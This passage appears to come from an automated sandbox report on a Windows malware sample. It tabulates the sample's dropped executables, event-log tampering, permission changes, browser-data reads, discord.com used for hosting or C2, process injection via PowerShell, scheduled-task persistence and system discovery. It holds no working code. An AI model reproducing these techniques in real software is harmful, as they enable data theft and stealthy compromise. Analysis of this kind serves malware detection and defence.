| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\$77main1.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\$77main1.exe | N/A |
| N/A | N/A | C:\Users\$77Redownloader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\winhlp32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\splwow64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\hh.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xwizard.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe | N/A |
Indicator Removal: Clear Windows Event Logs
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Reads user/profile data of web browsers
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | api64.ipify.org | N/A | N/A |
| N/A | api64.ipify.org | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\Recovery\ReAgent.xml | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\Recovery | C:\Windows\system32\ReAgentc.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2728 set thread context of 3480 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
| PID 1252 set thread context of 4764 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\SysWOW64\dllhost.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\system32\ReAgentc.exe | N/A |
| File created | C:\Windows\Tasks\$77svc32.job | C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe | N/A |
| File opened for modification | C:\Windows\Tasks\$77svc32.job | C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe | N/A |
| File created | C:\Windows\Tasks\$77svc64.job | C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe | N/A |
| File opened for modification | C:\Windows\Tasks\$77svc64.job | C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe | N/A |
| File opened for modification | C:\Windows\Logs\ReAgent\ReAgent.log | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\system32\ReAgentc.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\$77Redownloader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\winhlp32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\xwizard.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\$77main1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\splwow64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\hh.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\System32\mousocoreworker.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 07 Oct 2024 10:40:09 GMT" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1728297608" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
